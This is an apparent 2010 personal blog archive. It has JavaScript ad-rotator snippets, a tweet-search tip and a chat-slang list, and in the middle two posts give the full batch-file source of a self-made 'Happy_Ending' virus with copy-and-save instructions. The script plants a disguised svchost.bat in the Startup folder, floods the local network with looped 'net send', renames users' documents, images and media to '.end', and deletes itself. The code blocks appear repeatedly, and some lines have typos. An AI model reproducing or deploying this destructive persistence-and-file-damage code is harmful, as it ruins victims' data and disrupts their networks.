Sunday, December 26, 2010
Saturday, December 25, 2010
Friday, December 24, 2010
Sunday, December 19, 2010
Tuesday, December 14, 2010
Price India.In
Check out this cool site. You can find the price of any thing (I MEAN ANYTHING) sold in India, from computers (which I M interested in) to cars, toys, electronics and much much more.
I found this site a little interesting so here is D link
I found this site a little interesting so here is D link
Monday, November 1, 2010
SWF rotator version of the Ad Rotator script
Earlier I posted a simple script 2 rotate banner ads randomly by javascript.
U can use it 2 place jpgs, gifs & pngs, but 2 place flash files U need some changes 2 B done in them, so I M posting this version 4 placing swf files.
Again this is very simple script & in no way I M sure that it might B appealing 2 U. But it will work & I have tested it on many browsers and it is simple.
So here is D code
// Swf rotator script created by Tanmay Das
// Script © Copyright, Tanmay
// Visit
// Ad your swfs here
// e.g. 'ad1.swf',
// DO NOT PUT a (,) at the end
function random(limit){
return Math.floor(Math.random()*limit);
function randomSwf(swfArr)
var swfSrc, swfW, swfH, r;
r = random(swfArr.length / 1);
swfSrc = swfArr[r * 1];
swfW = 180; // You can change the swf width
swfH = 150; // You can change the swf height
document.write('<embed src='+swfSrc+' width='+swfW+' height='+swfH+' autostart=true loop=true></embed><br>
<a href="" title="Created By Tanmay Das" target="_blank">Designed By Tanmay Das</a>');
U can use it 2 place jpgs, gifs & pngs, but 2 place flash files U need some changes 2 B done in them, so I M posting this version 4 placing swf files.
Again this is very simple script & in no way I M sure that it might B appealing 2 U. But it will work & I have tested it on many browsers and it is simple.
So here is D code
// Swf rotator script created by Tanmay Das
// Script © Copyright, Tanmay
// Visit
// Ad your swfs here
// e.g. 'ad1.swf',
// DO NOT PUT a (,) at the end
function random(limit){
return Math.floor(Math.random()*limit);
function randomSwf(swfArr)
var swfSrc, swfW, swfH, r;
r = random(swfArr.length / 1);
swfSrc = swfArr[r * 1];
swfW = 180; // You can change the swf width
swfH = 150; // You can change the swf height
document.write('<embed src='+swfSrc+' width='+swfW+' height='+swfH+' autostart=true loop=true></embed><br>
<a href="" title="Created By Tanmay Das" target="_blank">Designed By Tanmay Das</a>');
Sunday, October 31, 2010
Simple Ad Rotator Script
Sorry I was offline 4 some time but that time gave me some thought & I went creative. I designed 30 web-templates ready to B sold. But also have created a simple script to rotate image banners.
It is not required if U use Google™ Adsense, but if U have your own ads than It'll B very useful. It is simple to use & doesn't requires any database or PHP.
So if U want it then here it is.
// Ad rotator script created by Tanmay Das
// Script © Copyright, Tanmay Das
// Visit
// Ad your images, links and title here
// e.g. 'ad1.jpg','','Title Goes here',
// DO NOT PUT a (,) at the end
function random(limit){
return Math.floor(Math.random()*limit);
function randomAd(imgArr)
var imgSrc, imgW, imgH, imgUrl, imgTit, r;
r = random(imgArr.length / 3);
imgSrc = imgArr[r * 3];
imgW = 180; // You can change the ad width
imgH = 150; // You can change the ad height
// I decided that all D banners in one area of a site will B of D same size, so I made the size universal 4 all.
imgUrl = imgArr[(r * 3)+1];
imgTit = imgArr[(r * 3)+2];
document.write('<a href='+imgUrl+' title='+imgTit+' target=_blank><IMG SRC='+imgSrc+' WIDTH='+imgW+' HEIGHT='+imgH+'></a><br><a href="" title="Created By Tanmay Das" target="_blank">Designed By Tanmay Das</a>');
Just save it as adfile.js and add the link to anywhere on your site where U want the ads.
Remember that all the banners should B of D same size & change the width & height at imgW &imgH.
It is not required if U use Google™ Adsense, but if U have your own ads than It'll B very useful. It is simple to use & doesn't requires any database or PHP.
So if U want it then here it is.
// Ad rotator script created by Tanmay Das
// Script © Copyright, Tanmay Das
// Visit
// Ad your images, links and title here
// e.g. 'ad1.jpg','','Title Goes here',
// DO NOT PUT a (,) at the end
function random(limit){
return Math.floor(Math.random()*limit);
function randomAd(imgArr)
var imgSrc, imgW, imgH, imgUrl, imgTit, r;
r = random(imgArr.length / 3);
imgSrc = imgArr[r * 3];
imgW = 180; // You can change the ad width
imgH = 150; // You can change the ad height
// I decided that all D banners in one area of a site will B of D same size, so I made the size universal 4 all.
imgUrl = imgArr[(r * 3)+1];
imgTit = imgArr[(r * 3)+2];
document.write('<a href='+imgUrl+' title='+imgTit+' target=_blank><IMG SRC='+imgSrc+' WIDTH='+imgW+' HEIGHT='+imgH+'></a><br><a href="" title="Created By Tanmay Das" target="_blank">Designed By Tanmay Das</a>');
Just save it as adfile.js and add the link to anywhere on your site where U want the ads.
Remember that all the banners should B of D same size & change the width & height at imgW &imgH.
Wednesday, May 19, 2010
Saturday, May 15, 2010
HAPPY_ENDING.B Virus (New version with some new coding)
i have made some changes in my old Happy Ending virus and created it's B version. Hope U like it.
Copy this code & paste it in Notepad & save it as happy.bat
@echo off
:: Y0UR_(0MPU73R_15_D34D
:: 7H15_15_MY_H4PPY_3ND1N6_/1RU5
:: H0P3_Y0U_L1K3_17
:: (0MPL3M3N75_FR0M
:: NRK89
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" goto d13
echo @echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo title Gift from NRK89 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo color 04 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Copies D network blocking file from it's backup and changes it 2 .bat
echo if exist "C:\WINDOWS\AppPatch\cnet.bat" goto 8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\msagent\cnet.nrk" "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Copy the virus strings in different parts of D computer
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Program Files\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HACKED_BY_NRK89.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "D:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Copies D extension changing file from it's backup and changes it 2 .bat
echo if exist "C:\WINDOWS\Config\extn.bat" goto ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\Registration\extn.nrk" "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo satrt "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo start "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Types the last message on the command prompt
echo type "C:\WINDOWS\ehome\msg.nrk" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo pause >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: This file will flood D network of the user on executed
echo @echo off > "C:\WINDOWS\system32\cnet.nrk"
echo color 04 >> "C:\WINDOWS\system32\cnet.nrk"
echo :hit >> "C:\WINDOWS\system32\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo goto hit >> "C:\WINDOWS\msagent\cnet.nrk"
:: This is a harmless virus strings just 2 scare D user
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$ There will be no more HAPPY ENDING in your life from now $H+H* > "C:\WINDOWS\security\end.nrk"
:: This file will change D extensions od all text, doc, image audio and video files 2 .end
echo @echo off > "C:\WINDOWS\Registration\extn.nrk"
echo ren *.txt *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.doc *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpeg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.bmp *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.gif *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.ico *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mp3 *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.avi *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.wmv *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo exit >> "C:\WINDOWS\Registration\extn.nrk"
:: D last message that D user will see on D command prompt b4 his computer dies
echo Hi there do U know that your computer has been hacked?? > "C:\WINDOWS\ehome\msg.nrk"
echo Don't worry U will find that out very very soon. >> "C:\WINDOWS\ehome\msg.nrk"
echo My name is NRK89 and I have hacked your computer and placed a virus. >> "C:\WINDOWS\ehome\msg.nrk"
echo It's my favorite Happy Ending virus that will make sure that >> "C:\WINDOWS\ehome\msg.nrk"
:: Deletes D actual virus after it's work is done
del %0
P.S.- Remove all D comments (lines starting with ::) from between D coding so that it runs faster.
Copy this code & paste it in Notepad & save it as happy.bat
@echo off
:: Y0UR_(0MPU73R_15_D34D
:: 7H15_15_MY_H4PPY_3ND1N6_/1RU5
:: H0P3_Y0U_L1K3_17
:: (0MPL3M3N75_FR0M
:: NRK89
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" goto d13
echo @echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo title Gift from NRK89 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo color 04 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Copies D network blocking file from it's backup and changes it 2 .bat
echo if exist "C:\WINDOWS\AppPatch\cnet.bat" goto 8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\msagent\cnet.nrk" "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Copy the virus strings in different parts of D computer
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Program Files\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HACKED_BY_NRK89.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "D:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Copies D extension changing file from it's backup and changes it 2 .bat
echo if exist "C:\WINDOWS\Config\extn.bat" goto ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\Registration\extn.nrk" "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo satrt "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo start "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: Types the last message on the command prompt
echo type "C:\WINDOWS\ehome\msg.nrk" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo pause >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
:: This file will flood D network of the user on executed
echo @echo off > "C:\WINDOWS\system32\cnet.nrk"
echo color 04 >> "C:\WINDOWS\system32\cnet.nrk"
echo :hit >> "C:\WINDOWS\system32\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo goto hit >> "C:\WINDOWS\msagent\cnet.nrk"
:: This is a harmless virus strings just 2 scare D user
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$ There will be no more HAPPY ENDING in your life from now $H+H* > "C:\WINDOWS\security\end.nrk"
:: This file will change D extensions od all text, doc, image audio and video files 2 .end
echo @echo off > "C:\WINDOWS\Registration\extn.nrk"
echo ren *.txt *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.doc *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpeg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.bmp *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.gif *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.ico *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mp3 *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.avi *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.wmv *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo exit >> "C:\WINDOWS\Registration\extn.nrk"
:: D last message that D user will see on D command prompt b4 his computer dies
echo Hi there do U know that your computer has been hacked?? > "C:\WINDOWS\ehome\msg.nrk"
echo Don't worry U will find that out very very soon. >> "C:\WINDOWS\ehome\msg.nrk"
echo My name is NRK89 and I have hacked your computer and placed a virus. >> "C:\WINDOWS\ehome\msg.nrk"
echo It's my favorite Happy Ending virus that will make sure that >> "C:\WINDOWS\ehome\msg.nrk"
:: Deletes D actual virus after it's work is done
del %0
P.S.- Remove all D comments (lines starting with ::) from between D coding so that it runs faster.
Saturday, May 1, 2010
Happy_Ending Virus by Tanmay Das
It's every one's dream 2 create a virus. It took me long but here it is my first ever virus. I M not a programmer so this is quite simple, but it is dangerous so don't use it. It is just 4 educational purpose & 2 brag about. It does not spread itself through D net. it doesn't infects or copies itself.
On execution it creates a file which loads on next boot up. Also it creates backups of files in .nrk format in different folders in C drive. Then it deleted itself.
D file created copies D backup files in other folders & rename them with proper extensions. One file floods D network of D user. second one change D extension of all picture, video & audio files 2 .end. D last file actually is a virus string detected by all antivirus which causes a panic 2 D user.
Being a batch file is quite simple & U can understand D code easily.
So her is D virus code.
@echo off
:: Y0UR_(0MPU73R_15_D34D
:: 7H15_15_MY_H4PPY_3ND1N6_/1RU5
:: H0P3_Y0U_L1K3_17
:: (0MPL3M3N75_FR0M
:: NRK89
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" goto d13
echo @echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo if exist "C:\WINDOWS\AppPatch\cnet.bat" goto 8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\msagent\cnet.nrk" "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Program Files\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HACKED_BY_NRK89.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "D:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo if exist "C:\WINDOWS\Config\extn.bat" goto ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\Registration\extn.nrk" "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo satrt "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo start "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo @echo off > "C:\WINDOWS\system32\cnet.nrk"
echo color 04 >> "C:\WINDOWS\system32\cnet.nrk"
echo :hit >> "C:\WINDOWS\system32\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo goto hit >> "C:\WINDOWS\msagent\cnet.nrk"
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$ There will be no more HAPPY ENDING in your life from now $H+H* > "C:\WINDOWS\security\end.nrk"
echo @echo off > "C:\WINDOWS\Registration\extn.nrk"
echo ren *.txt *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.doc *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpeg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.bmp *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.gif *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.ico *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mp3 *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.avi *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.wmv *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo exit >> "C:\WINDOWS\Registration\extn.nrk"
del %0
Copy & Paste D code in Notepad & save it as happy.bat (U can save it with any name but 4 now save it as happy.bat)
Now what does D virus does?
First it creates a file named svchost.bat in Startup Folder, so that it starts on every boot up.
Then it creates multiple files including cnet.nrk, end.nrk & extn.nrk in different folders in C:/WINDOWS/
Last D virus deletes D original file, hence U have 2 name it happy.bat.
If U want 2 change D name of D virus then place D same name on D last line (del happy.bat)
P.S.- It'll not format D Hard Drive but I'll render D files useless, so don't use it on others' computer.
On execution it creates a file which loads on next boot up. Also it creates backups of files in .nrk format in different folders in C drive. Then it deleted itself.
D file created copies D backup files in other folders & rename them with proper extensions. One file floods D network of D user. second one change D extension of all picture, video & audio files 2 .end. D last file actually is a virus string detected by all antivirus which causes a panic 2 D user.
Being a batch file is quite simple & U can understand D code easily.
So her is D virus code.
@echo off
:: Y0UR_(0MPU73R_15_D34D
:: 7H15_15_MY_H4PPY_3ND1N6_/1RU5
:: H0P3_Y0U_L1K3_17
:: (0MPL3M3N75_FR0M
:: NRK89
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" goto d13
echo @echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo if exist "C:\WINDOWS\AppPatch\cnet.bat" goto 8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\msagent\cnet.nrk" "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Program Files\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HACKED_BY_NRK89.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "D:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo if exist "C:\WINDOWS\Config\extn.bat" goto ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\Registration\extn.nrk" "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo satrt "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo start "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo @echo off > "C:\WINDOWS\system32\cnet.nrk"
echo color 04 >> "C:\WINDOWS\system32\cnet.nrk"
echo :hit >> "C:\WINDOWS\system32\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo goto hit >> "C:\WINDOWS\msagent\cnet.nrk"
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$ There will be no more HAPPY ENDING in your life from now $H+H* > "C:\WINDOWS\security\end.nrk"
echo @echo off > "C:\WINDOWS\Registration\extn.nrk"
echo ren *.txt *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.doc *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpeg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.bmp *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.gif *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.ico *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mp3 *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.avi *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.wmv *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo exit >> "C:\WINDOWS\Registration\extn.nrk"
del %0
Copy & Paste D code in Notepad & save it as happy.bat (U can save it with any name but 4 now save it as happy.bat)
Now what does D virus does?
First it creates a file named svchost.bat in Startup Folder, so that it starts on every boot up.
Then it creates multiple files including cnet.nrk, end.nrk & extn.nrk in different folders in C:/WINDOWS/
Last D virus deletes D original file, hence U have 2 name it happy.bat.
If U want 2 change D name of D virus then place D same name on D last line (del happy.bat)
P.S.- It'll not format D Hard Drive but I'll render D files useless, so don't use it on others' computer.
Friday, April 23, 2010
Tweet Search with Topsy
For all those Twitter™ people here is something useful. Topsy is a search engine powered by tweets. It means that U can search tweets through this site.
This is great Bcause when U search on Twitter™, U get results on the basis of names, email ids & brands. But in Topsy U can get D actual tweets that U want 2 find. I have used it & it is quite something. It is still in it's BETA stage, so it'll get better by time.
This is great Bcause when U search on Twitter™, U get results on the basis of names, email ids & brands. But in Topsy U can get D actual tweets that U want 2 find. I have used it & it is quite something. It is still in it's BETA stage, so it'll get better by time.
Thursday, April 22, 2010
Internet Slangs for chatting
Many of us chat on D net & many of us (including me) use slangs like lol & BFF.
Now apart from these common slangs there R many others that many of us don't know about. So here is a short list of slangs that I found on D net.
@ - at
@teotd - at the end of the day
1 - one or won
14aa41 - one for all and all for one
2 - to, too, or two
2b or not 2b - to be or not to be
2dA - today
3sum - threesome
4 - for, four, or the prefix or suffix: fore)
411 - information
4ever - forever
86 - out of, or over
aaaaa - American association against acronym abuse
aaf - as a friend
aak - asleep at keyboard
aamoi - as a matter of interest
aar, aar8 - at any rate
aas - alive and smiling
aatk - always at the keyboard
aayf - as always, your friend
ab - ass backwards
abithiwtidb - a bird in the hand is worth two in the bush
abt2 - about to
acd - alt control delete
ace - access control entry
ack - acknowledgement
adad - another day, another dollar
adbb - all done bye bye
adih - another day in hell
adip - another day in paradise
afagay - a friend as good as you
afahmasp - a fool and his money are soon parted
afaic - as far as I'm concerned
afaiu - as far as I understand
afap - as far as possible
afayc - as far as your concerned
afc - away from computer
afdn - any f***ing day now
afiaa - as far as I am aware
afiniafi - a friend in need is a friend indeed
afz - acronym free zone
agkwe - and God knows what else
aiamu - and I'm a monkey's uncle
aih - as it happens
aimb - as I mentioned before
aimp - always in my prayers
aise - as I said earlier
aisi - as I see it
alol - actually laughing out loud
alot or allot - a lot
altg - act locally, think globally
amap - as many as possible
ambw - all my best wishes
aml - all my love
and - any day now
anfawfows - and now a word from our web sponsor
aoas - all of a sudden
aob - abuse of bandwidth
asafp - as soon as freakin possible
aslmh - age,sex,location,music,hobbies
atb - all the best
atst - at the same time
atw - all the web, or around the web
ayk - as you know
aysos - are you stupid or something
aytmtb - and you're telling me this because?
b - be, bee
b/c - because
b4u - before you
b4uki - before you know it
bag - busting a gut
bai - bye
bak - back at my keyboard
bau - business as usual
bb - bye-bye
bb4n, bbfn - bye bye for now
bbbg - bye bye, be good
bbias - be back in a sec
bbiaw - be back in a while
bbn - bye bye now
bbsd - be back soon darling
bbsl - be back sooner or later
bbt - be back tomorrow
bc - because
bcoz - because
bdn - big d**n number
bf - boyfriend
bfd - big f***ing deal
bg - big grin
bif - before I forget
bion - believe it or not
bioyn - blow it out your nose
bitd - back in the day
bk - big kiss
bka - better known as
bm - bite me
bmota - bite me on the ass
bohica - bend over, here it comes again
bout - about
br - bathroom
brt - be right there
bs - big smile, bull sh**
btdt - been there done that
bthoom - beats the heck out of me
btsoom - beats the sh** out of me
btwbo - be there with bells on
bw - best wishes
bwd - backward
bwdik - but what do I know
by - busy
bykt - but you knew that
c-p - sleepy
c-t - city
c - see
'cause - because
cb - call back, chat brat
cfv - call for vote
cid - consider it done
cmiw - correct me if I'm wrong
cos, coz - because
craft - can't remember a f***ing thing
crat - can't remember a thing
csl - can't stop laughing
cul, cul8r - see you later
cus - because
cuz or cuzz - because
cwyl - chat with you later
cyt - see you tomorrow
da - the
dat - that
deti - don't even think it
df - dear friend
dga - don't go away (or anywhere)
dgara - don't give a rat's a**
dgt - don't go there
dhyb - don't hold your breath
diaf - die in a fire
diku - do I know you?
dis - this
dkdc - don't know, don't care
dltm - don't lie to me
dnc - does not compute
doin - doing
dos - those
dqydj - don't quit your day job
drib - don't read if busy
dunno - don't know
dust - did you see that?
duz - does
duznt - doesn't
dyjhiw - don't you just hate it when...
dyofdw - do your own f***ing dirty work
dystsott - did you see the size of that thing?
e123 - easy as 123
eak - eating at the keyboard
em - them, excuse me
eso - equipment smarter than operator
evar - ever
ewi - emailing while intoxicated
ez - easy
faql - frequently asked questions list
fav - favorite
fawc - for anyone who cares
fe - fatal error
fitb - fill in the blanks
fo - f*** off
foc - free of charge
foe - for
fofl - falling on floor laughing
ftasb - faster than a speeding bullet
fttb - for the time being
fwd - forward
fya - for your amusement
g or - grin
ga - go ahead
gbh - great big hug
ggn - gotta go now
go2 - go to
gok - God only knows
gonna - going to
gth - go to hell
gtsy - good to see you
gud - good
h2 - how to
hagd - have a good day
hai - hi
hhoj - ha ha, only joking
hhtyay - happy holidays to you and yours
hih - hope it helps
hlp - help
hua - heads up ace
hugz - hugs
huh - have you heard
huya - head up your a**
i1dr - I wonder
iae - in any event
ianac - I am not a crook
ianae - I am not an expert
iat - I am tired
ibrb - I'll be right back
ibt - in between technology
ibtd - I beg to differ
icbw - I could be wrong
iccl - I couldn't care less
idgaf - I dont' give a f***
idgi - I don't get it
idky - I don't know you
idl - ideal
idm - it doesn't matter
idst - I didn't say that
idts - I don't think so
ifu - I f***ed up
igtp - I get the point
ihaim - I have another instant message
ihno - I have no opinion
iimad - if it makes a difference
iir - if I remember
iiwm - if it were me
ik - I know
imnsho - in my not so humble opinion
